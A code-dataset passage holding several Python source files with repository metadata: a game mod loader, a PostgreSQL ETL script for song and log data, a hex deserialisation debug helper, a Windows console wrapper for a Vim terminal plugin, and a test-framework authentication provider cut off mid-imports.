    """Return the names of packages found under every path's "mods" folder.

    :param check_mod_type: predicate selecting mods (default) or soundpacks
    """
    result = []
    for package_path in get_all_packages_paths():
        mods_path = os.path.join(package_path, "mods")
        # Fixed: a package path without a "mods" folder previously made
        # os.listdir raise FileNotFoundError; such paths are now skipped.
        if not os.path.isdir(mods_path):
            continue
        for mod in os.listdir(mods_path):
            mod_path = os.path.join(mods_path, mod)
            if os.path.isdir(mod_path) and check_mod_type(mod_path) and mod not in result:
                result.append(mod)
    return result
def available_soundpacks():
    """Return the names of the available packages that qualify as soundpacks."""
    return available_mods(is_a_soundpack)
| 23.556962 | 95 | 0.699624 |
import os
from . import config, options
from .lib.resource import ResourceLoader
from .paths import MAPS_PATHS
def get_all_packages_paths():
return MAPS_PATHS
if options.mods is not None:
mods = options.mods
else:
mods = config.mods
_r = ResourceLoader(mods, config.soundpacks, get_all_packages_paths())
mods = _r.mods
soundpacks = _r.soundpacks
get_text_file = _r.get_text_file
load_texts = _r.load_texts
get_sound_paths = _r.get_sound_paths
def reload_all():
global mods, soundpacks
from .clientmedia import sounds, update_display_caption
_r.update_mods_list(mods, soundpacks, get_all_packages_paths())
mods = _r.mods
soundpacks = _r.soundpacks
update_display_caption()
sounds.load_default(_r)
def set_mods(new_mods):
global mods
if new_mods != mods:
mods = new_mods
reload_all()
def set_soundpacks(new_soundpacks):
global soundpacks
if new_soundpacks != soundpacks:
soundpacks = new_soundpacks
reload_all()
def is_a_soundpack(path):
for name in ("rules.txt", "ai.txt"):
if os.path.isfile(os.path.join(path, name)):
return False
return True
def is_a_mod(path):
return not is_a_soundpack(path)
def available_mods(check_mod_type=is_a_mod):
result = []
for path in get_all_packages_paths():
mods_path = os.path.join(path, "mods")
for mod in os.listdir(mods_path):
path = os.path.join(mods_path, mod)
if os.path.isdir(path) and check_mod_type(path) and mod not in result:
result.append(mod)
return result
def available_soundpacks():
return available_mods(is_a_soundpack)
| true | true |
1c333d0051d4c4cf7ff7cd86bb2a6b0e789d47e6 | 3,434 | py | Python | DataModelling_PostgreSQL/etl.py | RammySekham/Data-Engineering | eec1020defe9c54403f6a80ba91fc071ed22b727 | [
"MIT"
] | 1 | 2021-06-08T15:49:50.000Z | 2021-06-08T15:49:50.000Z | DataModelling_PostgreSQL/etl.py | RammySekham/Data-Engineering | eec1020defe9c54403f6a80ba91fc071ed22b727 | [
"MIT"
] | null | null | null | DataModelling_PostgreSQL/etl.py | RammySekham/Data-Engineering | eec1020defe9c54403f6a80ba91fc071ed22b727 | [
"MIT"
] | null | null | null | import os
import glob
import psycopg2
import pandas as pd
import settings
from sql_queries import *
def process_song_file(cur, filepath):
    """
    Insert the song and artist records contained in one song JSON file.

    :param cur: open database cursor
    :param filepath: path of the song file (line-delimited JSON, one record)
    """
    df = pd.read_json(filepath, lines=True)

    # song record: first (only) row of the selected columns
    song_fields = ['song_id', 'title', 'artist_id', 'year', 'duration']
    song_data = df[song_fields].values[0]
    cur.execute(song_table_insert, song_data)

    # artist record
    artist_fields = ['artist_id', 'artist_name', 'artist_location',
                     'artist_latitude', 'artist_longitude']
    artist_data = df.loc[0, artist_fields].values.tolist()
    cur.execute(artist_table_insert, artist_data)
def process_log_file(cur, filepath):
    """Load one activity-log JSON file into the time, user and songplay tables.

    Only "NextSong" events are processed.  The 'ts' column holds epoch
    *milliseconds*.

    cur      -- open database cursor
    filepath -- path to a line-delimited JSON log file
    """
    # open log file
    df = pd.read_json(filepath, lines=True)

    # filter by NextSong action
    df = df[df.loc[:, 'page'] == "NextSong"]

    # Convert the epoch-millisecond column explicitly.  The previous
    # `pd.to_datetime(df.ts / 1000)` fed epoch *seconds* to to_datetime's
    # default nanosecond unit, so every row decoded to ~1970-01-01 and the
    # whole time dimension table was wrong.
    t = pd.to_datetime(df.ts, unit='ms')

    # insert time data records
    time_data = {'t': t, 'hour': t.dt.hour, 'day': t.dt.day,
                 'week': t.dt.isocalendar().week, 'month': t.dt.month,
                 'year': t.dt.year, 'weekday': t.dt.weekday}
    column_labels = ['t', 'hour', 'day', 'week', 'month', 'year', 'weekday']
    time_df = pd.DataFrame(data=time_data, columns=column_labels)
    for i, row in time_df.iterrows():
        cur.execute(time_table_insert, list(row))

    # load and insert user records
    user_df = df.loc[:, ['userId', 'firstName', 'lastName', 'gender', 'level']]
    for i, row in user_df.iterrows():
        cur.execute(user_table_insert, row)

    # insert songplay records, resolving song/artist ids first
    for index, row in df.iterrows():
        cur.execute(song_select, (row.song, row.artist, row.length))
        results = cur.fetchone()
        if results:
            songid, artistid = results
        else:
            songid, artistid = None, None
        # unit='ms' matches the time-table conversion above (the former
        # `row.ts / 1000` with unit='s' was equivalent but inconsistent).
        songplay_data = (pd.Timestamp(row.ts, unit='ms'), row.userId,
                         row.level, songid, artistid, row.sessionId,
                         row.location, row.userAgent)
        cur.execute(songplay_table_insert, songplay_data)
def process_data(cur, conn, filepath, func):
    """Apply *func* to every *.json file found under *filepath*.

    Each file is handled with func(cur, path) and committed on *conn*
    before moving to the next one; progress is printed per file.
    """
    json_files = []
    for root, _dirs, _files in os.walk(filepath):
        matches = glob.glob(os.path.join(root, '*.json'))
        json_files.extend(os.path.abspath(match) for match in matches)

    total = len(json_files)
    print('{} files found in {}'.format(total, filepath))

    # Commit after every file so progress survives a mid-run failure.
    for index, datafile in enumerate(json_files, 1):
        func(cur, datafile)
        conn.commit()
        print('{}/{} files processed.'.format(index, total))
def main():
    """ETL entry point: load all song files, then all log files.

    Connects with the credentials from the settings module and guarantees
    the cursor and the connection are released even when processing fails
    (the original leaked both on any exception and never closed the cursor).
    Commits are performed per-file inside process_data.
    """
    conn = psycopg2.connect(host=settings.host, dbname=settings.new_db,
                            user=settings.user, password=settings.password,
                            port=settings.port)
    try:
        cur = conn.cursor()
        try:
            process_data(cur, conn, filepath='data/song_data',
                         func=process_song_file)
            process_data(cur, conn, filepath='data/log_data',
                         func=process_log_file)
        finally:
            cur.close()
    finally:
        conn.close()
if __name__ == "__main__":
main() | 31.218182 | 151 | 0.647059 | import os
import glob
import psycopg2
import pandas as pd
import settings
from sql_queries import *
def process_song_file(cur, filepath):
df = pd.read_json(filepath, lines=True)
song_data = df[['song_id', 'title', 'artist_id', 'year', 'duration']].values[0]
cur.execute(song_table_insert, song_data)
artist_data = df.loc[0, ['artist_id', 'artist_name', 'artist_location', 'artist_latitude','artist_longitude']].values.tolist()
cur.execute(artist_table_insert, artist_data)
def process_log_file(cur, filepath):
df = pd.read_json(filepath, lines=True)
df = df[df.loc[:, 'page']=="NextSong"]
t = pd.to_datetime((df.ts)/1000)
time_data = {'t':t, 'hour':t.dt.hour, 'day':t.dt.day, 'week':t.dt.isocalendar().week, 'month':t.dt.month, 'year':t.dt.year, 'weekday':t.dt.weekday}
column_labels = ['t', 'hour', 'day', 'week', 'month', 'year', 'weekday']
time_df = pd.DataFrame(data=time_data, columns=column_labels)
for i, row in time_df.iterrows():
cur.execute(time_table_insert, list(row))
user_df = (df.loc[:, ['userId', 'firstName', 'lastName', 'gender', 'level']])
for i, row in user_df.iterrows():
cur.execute(user_table_insert, row)
for index, row in df.iterrows():
cur.execute(song_select, (row.song, row.artist, row.length))
results = cur.fetchone()
if results:
songid, artistid = results
else:
songid, artistid = None, None
songplay_data = (pd.Timestamp(row.ts/1000, unit='s'), row.userId, row.level, songid, artistid, row.sessionId, row.location, row.userAgent)
cur.execute(songplay_table_insert, songplay_data)
def process_data(cur, conn, filepath, func):
all_files = []
for root, dirs, files in os.walk(filepath):
files = glob.glob(os.path.join(root,'*.json'))
for f in files :
all_files.append(os.path.abspath(f))
num_files = len(all_files)
print('{} files found in {}'.format(num_files, filepath))
for i, datafile in enumerate(all_files, 1):
func(cur, datafile)
conn.commit()
print('{}/{} files processed.'.format(i, num_files))
def main():
conn = psycopg2.connect(host=settings.host, dbname=settings.new_db, user=settings.user, password=settings.password, port=settings.port)
cur = conn.cursor()
process_data(cur, conn, filepath='data/song_data', func=process_song_file)
process_data(cur, conn, filepath='data/log_data', func=process_log_file)
conn.close()
if __name__ == "__main__":
main() | true | true |
1c333e6fb73118b48b9d8dd4e0ef09d56c4dbb63 | 470 | py | Python | bin/rehex.py | HashRentalCoin/sentinel | f8ddd4682a485c10f151968e130123597994b2fb | [
"MIT"
] | null | null | null | bin/rehex.py | HashRentalCoin/sentinel | f8ddd4682a485c10f151968e130123597994b2fb | [
"MIT"
] | null | null | null | bin/rehex.py | HashRentalCoin/sentinel | f8ddd4682a485c10f151968e130123597994b2fb | [
"MIT"
] | null | null | null | import simplejson
import binascii
import sys
import pdb
from pprint import pprint
import sys
import os
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../lib')))
import hashrentalcoinlib
# ============================================================================
# Debugging helper: deserialise a hex-encoded governance object given on the
# command line and drop into an interactive pdb session with the result
# bound to `obj`.
usage = "%s <hex>" % sys.argv[0]
obj = None
if len(sys.argv) < 2:
    print(usage)
    sys.exit(1)
else:
    obj = hashrentalcoinlib.deserialise(sys.argv[1])
# Intentional breakpoint: inspect `obj` interactively (e.g. `pprint(obj)`).
pdb.set_trace()
# NOTE(review): stray no-op expression below looks like debugging residue;
# harmless, but could be removed.
1
| 21.363636 | 84 | 0.6 | import simplejson
import binascii
import sys
import pdb
from pprint import pprint
import sys
import os
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../lib')))
import hashrentalcoinlib
usage = "%s <hex>" % sys.argv[0]
obj = None
if len(sys.argv) < 2:
print(usage)
sys.exit(1)
else:
obj = hashrentalcoinlib.deserialise(sys.argv[1])
pdb.set_trace()
1
| true | true |
1c333f90187e1951964e824ce8ea4d592a06fada | 8,791 | py | Python | vim/autoload/conque_term/conque_sole_wrapper.py | adifinem/dotvim | 73d1acc3cfa457ad3790a5b4612dc7479d6a7019 | [
"0BSD"
] | 413 | 2015-01-27T04:34:18.000Z | 2019-05-15T07:37:18.000Z | home/.vim/autoload/conque_term/conque_sole_wrapper.py | khilnani/dot_files | 6f8d40e5137e9c207023aff5e540c1ff3c00cff3 | [
"MIT"
] | 11 | 2015-03-03T08:34:44.000Z | 2018-09-22T22:18:55.000Z | home/.vim/autoload/conque_term/conque_sole_wrapper.py | khilnani/dot_files | 6f8d40e5137e9c207023aff5e540c1ff3c00cff3 | [
"MIT"
] | 107 | 2015-05-29T02:27:34.000Z | 2019-05-03T22:58:47.000Z | # FILE: autoload/conque_term/conque_sole_wrapper.py
# AUTHOR: Nico Raffo <nicoraffo@gmail.com>
# WEBSITE: http://conque.googlecode.com
# MODIFIED: 2011-09-02
# VERSION: 2.3, for Vim 7.0
# LICENSE:
# Conque - Vim terminal/console emulator
# Copyright (C) 2009-2011 Nico Raffo
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
ConqueSoleSubprocessWrapper
Subprocess wrapper to deal with Windows insanity. Launches console based python,
which in turn launches originally requested command. Communicates with cosole
python through shared memory objects.
"""
import ctypes
import time
class ConqueSoleWrapper():
    """Vim-side proxy for the console subprocess controller.

    open() launches a console python process (conque_sole_communicator.py)
    that in turn runs the user's command; all further communication happens
    through the shared memory blocks created by init_shared_memory().
    """

    # unique key used for shared memory block names
    shm_key = ''

    # process info
    handle = None
    pid = None

    # queue input in this bucket
    bucket = None

    # console size
    lines = 24
    columns = 80

    # shared memory objects
    shm_input = None
    shm_output = None
    shm_attributes = None
    shm_stats = None
    shm_command = None
    shm_rescroll = None
    shm_resize = None

    # console python process
    proc = None

    # NOTE(review): mutable default for `options`; open() only reads
    # options['CODE_PAGE'], so the shared default is harmless here.
    def open(self, cmd, lines, columns, python_exe='python.exe', communicator_py='conque_sole_communicator.py', options={}):
        """ Launch python.exe subprocess which will in turn launch the user's program.
        Arguments:
        cmd -- The user's command to run. E.g. "Powershell.exe" or "C:\Python27\Scripts\ipython.bat"
        lines, columns -- The size of the console, also the size of the Vim buffer
        python.exe -- The path to the python executable, typically C:\PythonXX\python.exe
        communicator_py -- The path to the subprocess controller script in the user's vimfiles directory
        options -- optional configuration
        """
        self.lines = lines
        self.columns = columns
        self.bucket = u('')
        # create a shm key; time-based so concurrent terminals don't collide
        self.shm_key = 'mk' + str(time.time())
        # python command
        cmd_line = '%s "%s" %s %d %d %d %d %s' % (python_exe, communicator_py, self.shm_key, int(self.columns), int(self.lines), int(options['CODE_PAGE']), int(CONQUE_FAST_MODE), cmd)
        # console window attributes
        flags = NORMAL_PRIORITY_CLASS | DETACHED_PROCESS | CREATE_UNICODE_ENVIRONMENT
        si = STARTUPINFO()
        pi = PROCESS_INFORMATION()
        # start the stupid process already
        try:
            res = ctypes.windll.kernel32.CreateProcessW(None, u(cmd_line), None, None, 0, flags, None, u('.'), ctypes.byref(si), ctypes.byref(pi))
        except:
            raise
        # handle
        self.pid = pi.dwProcessId
        # init shared memory objects
        self.init_shared_memory(self.shm_key)

    def read(self, start_line, num_lines, timeout=0):
        """ Read a range of console lines from shared memory.
        Returns a pair of lists containing the console text and console text attributes.
        """
        # emulate timeout by sleeping timeout time
        if timeout > 0:
            read_timeout = float(timeout) / 1000
            time.sleep(read_timeout)
        output = []
        attributes = []
        # get output; one fixed-width row per console line
        for i in range(start_line, start_line + num_lines + 1):
            output.append(self.shm_output.read(self.columns, i * self.columns))
            if not CONQUE_FAST_MODE:
                attributes.append(self.shm_attributes.read(self.columns, i * self.columns))
        return (output, attributes)

    def get_stats(self):
        """ Return a dictionary with current console cursor and scrolling information. """
        try:
            # A rescroll message means the console side reallocated its
            # buffer; reattach to the new shared memory before reading stats.
            rescroll = self.shm_rescroll.read()
            if rescroll != '' and rescroll != None:
                self.shm_rescroll.clear()
                # close down old memory
                self.shm_output.close()
                self.shm_output = None
                if not CONQUE_FAST_MODE:
                    self.shm_attributes.close()
                    self.shm_attributes = None
                # reallocate memory
                self.shm_output = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns * rescroll['data']['blocks'], 'output', rescroll['data']['mem_key'], True)
                self.shm_output.create('read')
                if not CONQUE_FAST_MODE:
                    self.shm_attributes = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns * rescroll['data']['blocks'], 'attributes', rescroll['data']['mem_key'], True, encoding='latin-1')
                    self.shm_attributes.create('read')
            stats_str = self.shm_stats.read()
            if stats_str != '':
                self.stats = stats_str
            else:
                return False
        except:
            # any shared-memory failure is reported as "no stats available"
            return False
        return self.stats

    def is_alive(self):
        """ Get process status. """
        # Before init_shared_memory() has run, optimistically report alive.
        if not self.shm_stats:
            return True
        stats_str = self.shm_stats.read()
        if stats_str:
            return (stats_str['is_alive'])
        else:
            return True

    def write(self, text):
        """ Write input to shared memory. """
        # Buffer locally and flush at most 500 characters per call, only
        # when the console side has drained the previous input.
        self.bucket += text
        istr = self.shm_input.read()
        if istr == '':
            self.shm_input.write(self.bucket[:500])
            self.bucket = self.bucket[500:]

    def write_vk(self, vk_code):
        """ Write virtual key code to shared memory using proprietary escape sequences. """
        seq = u("\x1b[") + u(str(vk_code)) + u("VK")
        self.write(seq)

    def idle(self):
        """ Write idle command to shared memory block, so subprocess controller can hibernate. """
        self.shm_command.write({'cmd': 'idle', 'data': {}})

    def resume(self):
        """ Write resume command to shared memory block, so subprocess controller can wake up. """
        self.shm_command.write({'cmd': 'resume', 'data': {}})

    def close(self):
        """ Shut it all down. """
        self.shm_command.write({'cmd': 'close', 'data': {}})
        # give the console side a moment to act on the close command
        time.sleep(0.2)

    def window_resize(self, lines, columns):
        """ Resize console window. """
        self.lines = lines
        # we don't shrink buffer width
        if columns > self.columns:
            self.columns = columns
        self.shm_resize.write({'cmd': 'resize', 'data': {'width': columns, 'height': lines}})

    def init_shared_memory(self, mem_key):
        """ Create shared memory objects. """
        self.shm_input = ConqueSoleSharedMemory(CONQUE_SOLE_INPUT_SIZE, 'input', mem_key)
        self.shm_input.create('write')
        self.shm_input.clear()
        self.shm_output = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns, 'output', mem_key, True)
        self.shm_output.create('write')
        if not CONQUE_FAST_MODE:
            self.shm_attributes = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns, 'attributes', mem_key, True, encoding='latin-1')
            self.shm_attributes.create('write')
        self.shm_stats = ConqueSoleSharedMemory(CONQUE_SOLE_STATS_SIZE, 'stats', mem_key, serialize=True)
        self.shm_stats.create('write')
        self.shm_stats.clear()
        self.shm_command = ConqueSoleSharedMemory(CONQUE_SOLE_COMMANDS_SIZE, 'command', mem_key, serialize=True)
        self.shm_command.create('write')
        self.shm_command.clear()
        self.shm_resize = ConqueSoleSharedMemory(CONQUE_SOLE_RESIZE_SIZE, 'resize', mem_key, serialize=True)
        self.shm_resize.create('write')
        self.shm_resize.clear()
        self.shm_rescroll = ConqueSoleSharedMemory(CONQUE_SOLE_RESCROLL_SIZE, 'rescroll', mem_key, serialize=True)
        self.shm_rescroll.create('write')
        self.shm_rescroll.clear()
        return True
# vim:foldmethod=marker
| 31.508961 | 204 | 0.639859 |
import ctypes
import time
class ConqueSoleWrapper():
shm_key = ''
handle = None
pid = None
bucket = None
lines = 24
columns = 80
shm_input = None
shm_output = None
shm_attributes = None
shm_stats = None
shm_command = None
shm_rescroll = None
shm_resize = None
proc = None
def open(self, cmd, lines, columns, python_exe='python.exe', communicator_py='conque_sole_communicator.py', options={}):
self.lines = lines
self.columns = columns
self.bucket = u('')
self.shm_key = 'mk' + str(time.time())
cmd_line = '%s "%s" %s %d %d %d %d %s' % (python_exe, communicator_py, self.shm_key, int(self.columns), int(self.lines), int(options['CODE_PAGE']), int(CONQUE_FAST_MODE), cmd)
flags = NORMAL_PRIORITY_CLASS | DETACHED_PROCESS | CREATE_UNICODE_ENVIRONMENT
si = STARTUPINFO()
pi = PROCESS_INFORMATION()
try:
res = ctypes.windll.kernel32.CreateProcessW(None, u(cmd_line), None, None, 0, flags, None, u('.'), ctypes.byref(si), ctypes.byref(pi))
except:
raise
self.pid = pi.dwProcessId
self.init_shared_memory(self.shm_key)
def read(self, start_line, num_lines, timeout=0):
if timeout > 0:
read_timeout = float(timeout) / 1000
time.sleep(read_timeout)
output = []
attributes = []
for i in range(start_line, start_line + num_lines + 1):
output.append(self.shm_output.read(self.columns, i * self.columns))
if not CONQUE_FAST_MODE:
attributes.append(self.shm_attributes.read(self.columns, i * self.columns))
return (output, attributes)
def get_stats(self):
try:
rescroll = self.shm_rescroll.read()
if rescroll != '' and rescroll != None:
self.shm_rescroll.clear()
self.shm_output.close()
self.shm_output = None
if not CONQUE_FAST_MODE:
self.shm_attributes.close()
self.shm_attributes = None
self.shm_output = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns * rescroll['data']['blocks'], 'output', rescroll['data']['mem_key'], True)
self.shm_output.create('read')
if not CONQUE_FAST_MODE:
self.shm_attributes = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns * rescroll['data']['blocks'], 'attributes', rescroll['data']['mem_key'], True, encoding='latin-1')
self.shm_attributes.create('read')
stats_str = self.shm_stats.read()
if stats_str != '':
self.stats = stats_str
else:
return False
except:
return False
return self.stats
def is_alive(self):
if not self.shm_stats:
return True
stats_str = self.shm_stats.read()
if stats_str:
return (stats_str['is_alive'])
else:
return True
def write(self, text):
self.bucket += text
istr = self.shm_input.read()
if istr == '':
self.shm_input.write(self.bucket[:500])
self.bucket = self.bucket[500:]
def write_vk(self, vk_code):
seq = u("\x1b[") + u(str(vk_code)) + u("VK")
self.write(seq)
def idle(self):
self.shm_command.write({'cmd': 'idle', 'data': {}})
def resume(self):
self.shm_command.write({'cmd': 'resume', 'data': {}})
def close(self):
self.shm_command.write({'cmd': 'close', 'data': {}})
time.sleep(0.2)
def window_resize(self, lines, columns):
self.lines = lines
if columns > self.columns:
self.columns = columns
self.shm_resize.write({'cmd': 'resize', 'data': {'width': columns, 'height': lines}})
def init_shared_memory(self, mem_key):
self.shm_input = ConqueSoleSharedMemory(CONQUE_SOLE_INPUT_SIZE, 'input', mem_key)
self.shm_input.create('write')
self.shm_input.clear()
self.shm_output = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns, 'output', mem_key, True)
self.shm_output.create('write')
if not CONQUE_FAST_MODE:
self.shm_attributes = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns, 'attributes', mem_key, True, encoding='latin-1')
self.shm_attributes.create('write')
self.shm_stats = ConqueSoleSharedMemory(CONQUE_SOLE_STATS_SIZE, 'stats', mem_key, serialize=True)
self.shm_stats.create('write')
self.shm_stats.clear()
self.shm_command = ConqueSoleSharedMemory(CONQUE_SOLE_COMMANDS_SIZE, 'command', mem_key, serialize=True)
self.shm_command.create('write')
self.shm_command.clear()
self.shm_resize = ConqueSoleSharedMemory(CONQUE_SOLE_RESIZE_SIZE, 'resize', mem_key, serialize=True)
self.shm_resize.create('write')
self.shm_resize.clear()
self.shm_rescroll = ConqueSoleSharedMemory(CONQUE_SOLE_RESCROLL_SIZE, 'rescroll', mem_key, serialize=True)
self.shm_rescroll.create('write')
self.shm_rescroll.clear()
return True
# vim:foldmethod=marker
| true | true |
1c334168306f7a6a86168569011754df1514469c | 7,674 | py | Python | cloudcafe/auth/provider.py | rcbops-qa/cloudcafe | d937f85496aadafbb94a330b9adb8ea18bee79ba | [
"Apache-2.0"
] | null | null | null | cloudcafe/auth/provider.py | rcbops-qa/cloudcafe | d937f85496aadafbb94a330b9adb8ea18bee79ba | [
"Apache-2.0"
] | null | null | null | cloudcafe/auth/provider.py | rcbops-qa/cloudcafe | d937f85496aadafbb94a330b9adb8ea18bee79ba | [
"Apache-2.0"
] | null | null | null | """
Copyright 2013 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cafe.drivers.unittest.decorators import memoized
from cloudcafe.auth.config import UserAuthConfig, UserConfig
from cloudcafe.extensions.rax_auth.v2_0.tokens_api.client import \
TokenAPI_Client as RaxTokenAPI_Client, \
MFA_TokenAPI_Client as RaxToken_MFA_API_Client
from cloudcafe.extensions.rax_auth.v2_0.tokens_api.behaviors \
import TokenAPI_Behaviors as RaxTokenAPI_Behaviors, \
MFA_TokenAPI_Behaviors as RaxToken_MFA_API_Behaviors
from cloudcafe.extensions.saio_tempauth.v1_0.client import \
TempauthAPI_Client as SaioAuthAPI_Client
from cloudcafe.extensions.saio_tempauth.v1_0.behaviors import \
TempauthAPI_Behaviors as SaioAuthAPI_Behaviors
from cloudcafe.identity.v2_0.behaviors import IdentityServiceBehaviors
class MemoizedAuthServiceCompositeException(Exception):
    """Raised when a service or endpoint cannot be found in the catalog."""
    pass
class MemoizedAuthServiceComposite(object):
    """Auth composite that caches access data across instances.

    The authentication calls are @memoized classmethods, so repeated
    composites with the same credentials/endpoint share one token request.
    Properties then expose the token, tenant and endpoint lookups for the
    configured service/region.
    """

    def __init__(
            self, service_name, region, endpoint_config=None,
            user_config=None):
        # Fall back to the globally configured endpoint/user settings.
        self.endpoint_config = endpoint_config or UserAuthConfig()
        self.user_config = user_config or UserConfig()
        self.service_name = service_name
        self.region = region

    @classmethod
    @memoized
    def get_rackspace_access_data(
            cls, username, api_key, tenant_id, auth_endpoint):
        """Authenticate via rax_auth; memoized per argument tuple."""
        client = RaxTokenAPI_Client(auth_endpoint, 'json', 'json')
        behaviors = RaxTokenAPI_Behaviors(client)
        return behaviors.get_access_data(username, api_key, tenant_id)

    @classmethod
    @memoized
    def get_rackspace_mfa_access_data(
            cls, username, password, tenant_id, auth_endpoint, passcode):
        """Authenticate via rax_auth_mfa; memoized per argument tuple.

        NOTE(review): `passcode` participates in the memoization key but is
        never forwarded to get_access_data() here — confirm whether that is
        intentional (AuthProvider.get_access_data does pass it through).
        """
        if passcode is None:
            # TODO: This is a place holder for adding the functionality to
            # use an external service (e.g. - SMS) to provide the passcode
            # Also add this to get_access_data() in the AuthProvider class
            pass
        token_client = RaxToken_MFA_API_Client(
            url=auth_endpoint, serialize_format='json',
            deserialize_format='json')
        token_behaviors = RaxToken_MFA_API_Behaviors(token_client)
        return token_behaviors.get_access_data(
            username=username, password=password, tenant_id=tenant_id)

    @classmethod
    @memoized
    def get_keystone_access_data(
            cls, username, password, tenant_name, auth_endpoint):
        """Authenticate via keystone; memoized per argument tuple."""
        return IdentityServiceBehaviors.get_access_data(
            username, password, tenant_name, auth_endpoint)

    @classmethod
    @memoized
    def get_saio_tempauth_access_data(
            cls, username, password, auth_endpoint):
        """Authenticate via SAIO tempauth; memoized per argument tuple."""
        client = SaioAuthAPI_Client(auth_endpoint)
        behaviors = SaioAuthAPI_Behaviors(client)
        return behaviors.get_access_data(username, password)

    @property
    def access_data(self):
        """Dispatch to the memoized auth call for the configured strategy."""
        if self.auth_strategy == 'keystone':
            return self.get_keystone_access_data(
                self.user_config.username, self.user_config.password,
                self.user_config.tenant_name,
                self.endpoint_config.auth_endpoint)
        elif self.auth_strategy == 'rax_auth':
            return self.get_rackspace_access_data(
                self.user_config.username, self.user_config.api_key,
                self.user_config.tenant_id, self.endpoint_config.auth_endpoint)
        elif self.auth_strategy == 'rax_auth_mfa':
            return self.get_rackspace_mfa_access_data(
                self.user_config.username, self.user_config.password,
                self.user_config.tenant_id, self.endpoint_config.auth_endpoint,
                self.user_config.passcode)
        elif self.auth_strategy == 'saio_tempauth':
            return self.get_saio_tempauth_access_data(
                self.user_config.username, self.user_config.password,
                self.endpoint_config.auth_endpoint)
        else:
            raise NotImplementedError

    @property
    def auth_strategy(self):
        """Configured auth strategy name, lower-cased."""
        return self.endpoint_config.strategy.lower()

    @property
    def token_id(self):
        """Token id from the (possibly cached) access data."""
        return self.access_data.token.id_

    @property
    def tenant_id(self):
        """Tenant id from the (possibly cached) access data."""
        return self.access_data.token.tenant.id_

    @property
    def public_url(self):
        """Public URL of this service's endpoint in the configured region.

        Raises MemoizedAuthServiceCompositeException when the endpoint has
        no public_url attribute.
        """
        endpoint = self.service.get_endpoint(self.region)
        try:
            return endpoint.public_url
        except AttributeError:
            # NOTE(review): "service service" below is a typo in the runtime
            # error message; left untouched here since it is program output.
            raise MemoizedAuthServiceCompositeException(
                "Unable to locate an endpoint with the region '{0}' in the "
                "service '{1}' from the service service catalog for user {2}. "
                "No public URL found.".format(
                    self.region, self.service_name, self.tenant_id))

    @property
    def service(self):
        """The catalog entry for service_name; raises if it is missing."""
        service = self.access_data.get_service(self.service_name)
        if not service:
            raise MemoizedAuthServiceCompositeException(
                "Unable to locate a service named '{0}' in the service catalog"
                " for the user {1}".format(self.service_name, self.tenant_id))
        return service
class AuthProvider(object):
    """Uncached authentication dispatcher for the configured strategy."""

    @staticmethod
    def get_access_data(endpoint_config=None, user_config=None):
        """Authenticate with the configured strategy and return access data.

        Supported strategies: keystone, rax_auth, rax_auth_mfa and
        saio_tempauth; any other strategy raises NotImplementedError.
        """
        endpoint_config = endpoint_config or UserAuthConfig()
        user_config = user_config or UserConfig()
        strategy = endpoint_config.strategy.lower()

        if strategy == 'keystone':
            return IdentityServiceBehaviors.get_access_data(
                user_config.username, user_config.password,
                user_config.tenant_name, endpoint_config.auth_endpoint)

        if strategy == 'rax_auth':
            token_client = RaxTokenAPI_Client(
                endpoint_config.auth_endpoint, 'json', 'json')
            return RaxTokenAPI_Behaviors(token_client).get_access_data(
                user_config.username, user_config.api_key,
                user_config.tenant_id)

        if strategy == 'rax_auth_mfa':
            passcode = user_config.passcode
            if passcode is None:
                # TODO: place holder for obtaining the passcode from an
                # external service (e.g. - SMS)
                pass
            token_client = RaxToken_MFA_API_Client(
                url=endpoint_config.auth_endpoint,
                serialize_format='json', deserialize_format='json')
            return RaxToken_MFA_API_Behaviors(token_client).get_access_data(
                username=user_config.username, password=user_config.password,
                tenant_id=user_config.tenant_id, passcode=passcode)

        if strategy == 'saio_tempauth':
            auth_client = SaioAuthAPI_Client(endpoint_config.auth_endpoint)
            return SaioAuthAPI_Behaviors(auth_client).get_access_data(
                user_config.username, user_config.password)

        raise NotImplementedError
| 40.603175 | 79 | 0.68061 | from cafe.drivers.unittest.decorators import memoized
from cloudcafe.auth.config import UserAuthConfig, UserConfig
from cloudcafe.extensions.rax_auth.v2_0.tokens_api.client import \
TokenAPI_Client as RaxTokenAPI_Client, \
MFA_TokenAPI_Client as RaxToken_MFA_API_Client
from cloudcafe.extensions.rax_auth.v2_0.tokens_api.behaviors \
import TokenAPI_Behaviors as RaxTokenAPI_Behaviors, \
